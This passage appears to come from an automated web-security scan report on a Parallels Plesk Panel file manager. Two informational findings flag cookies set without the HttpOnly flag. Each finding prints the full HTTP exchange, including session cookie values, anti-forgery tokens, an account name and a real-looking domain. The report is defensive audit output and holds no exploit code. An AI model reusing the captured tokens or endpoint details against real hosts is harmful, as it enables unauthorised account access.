<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.23. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/create-file/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/create-file/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /plesk/client@2/domain@1/hosting/file-manager/create-file/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/hosting/file-manager/?cmd=chdir&file=/httpdocs
Cache-Control: max-age=0
Origin: http://www.nosedivesailing.com:8880
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvcNELhCBJg408XAA
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; domaintrafficlist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30%3D; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard
Content-Length: 1138

------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="forgery_protection_token"

dc1721730e046f7e1de14c19e4a424be
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="cmd"

new_file
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="lock"

true
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="previous_page"


------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="wizaction"


------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="filter"


------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="page"

0
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="page_size"

25
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="sort"

name
------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="file"


------WebKitFormBoundaryvcNELhCBJg408XAA
Content-Disposition: form-data; name="subcmd"


------WebKitFormBoundaryvcNELhCBJg408XAA--

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:34:04 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:34:04 GMT
Connection: close
Content-Length: 23875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fftp-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fweb-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fanonymous-ftp%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager_new_file/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["wd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "wa":
                   if (el["wa_perm[" + id + "]"].checked) {
                       el["wd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "wd":
                   if (el["wd_perm[" + id + "]"].checked) {
                       el["wa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["xd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "xa":
                   if (el["xa_perm[" + id + "]"].checked) {
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["ra_perm[" + id + "]"].checked && el["wa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "xd":
                   if (el["xd_perm[" + id + "]"].checked) {
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                       if (el["rd_perm[" + id + "]"].checked && el["wd_perm[" + id + "]"].checked)
                           el["fd_perm[" + id + "]"].checked = true;
                   } else
                       el["fd_perm[" + id + "]"].checked = false;
                   break;
               case "fa":
                   if (el["fa_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = true;
                       el["wa_perm[" + id + "]"].checked = true;
                       el["xa_perm[" + id + "]"].checked = true;
                       el["rd_perm[" + id + "]"].checked = false;
                       el["wd_perm[" + id + "]"].checked = false;
                       el["xd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                   }
                   break;
               case "fd":
                   if (el["fd_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = true;
                       el["wd_perm[" + id + "]"].checked = true;
                       el["xd_perm[" + id + "]"].checked = true;
                       el["ra_perm[" + id + "]"].checked = false;
                       el["wa_perm[" + id + "]"].checked = false;
                       el["xa_perm[" + id + "]"].checked = false;
                       el["fa_perm[" + id + "]"].checked = false;
                   }
                   break;

               }
           }
       
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/hosting/file-manager/create-file/" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="new_file">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   




<div class="filemanagerTitle">
   Create new file in <span class="name"><A href="/plesk/client@2/domain@1/hosting/file-manager/create-file/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a></span>
</div>

<div class="formArea">
   <fieldset>
       <legend><input type="radio" class="checkbox" name="create_file_method" id="fid-upload_file_method" value="upload" > <label for="fid-upload_file_method">Upload file</label></legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <table class="formFields" cellspacing="0" width="100%">
           <tr>
               <td class="name">Path to file</td>
               <td><input type="file" name="userfile[0]"> <label for="fid-extract1">Upload archive and extract it</label> <input type="checkbox" class="checkbox" name="extract[0]" id="fid-extract1" value="true"></td>
           </tr>
           <tr>
               <td class="name">Path to file</td>
               <td><input type="file" name="userfile[1]"> <label for="fid-extract2">Upload archive and extract it</label> <input type="checkbox" class="checkbox" name="extract[1]" id="fid-extract2" value="true"></td>
           </tr>
           <tr>
               <td class="name">Path to file</td>
               <td><input type="file" name="userfile[2]"> <label for="fid-extract3">Upload archive and extract it</label> <input type="checkbox" class="checkbox" name="extract[2]" id="fid-extract3" value="true"></td>
           </tr>
       </table>

   </td></tr></table></fieldset>

   <fieldset>
       <legend><input type="radio" class="checkbox" name="create_file_method" id="fid-create_file_method" value="upload" checked> <label for="fid-create_file_method">File creation</label></legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

       <table class="formFields" cellspacing="0" width="100%">
           <tr>
               <td class="name">File name <span class="required">*</span></td>
               <td><input type="text" name="new_file" value=""></td>
           </tr>

           <tr>
               <td class="name">Use HTML template</td>
               <td><input type="checkbox" class="checkbox" name="htmltemplate" value="true"></td>
           </tr>

       </table>

   </td></tr></table></fieldset>
</div>






















<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">



   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0" nowrap><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter the file name and click to create it in the current directory.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);create_file_oC();;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);create_file_oC();;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);cancel_oC();;return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);cancel_oC();;return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></td>
       </tr></table>
   </div>


</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.24. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/hosting/file-manager/edit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/hosting/file-manager/edit/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/hosting/file-manager/edit/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:58:35 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:58:37 GMT
Connection: close
Content-Length: 56914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fcertificate%2540%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fmpc-certificates%252F%2F' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
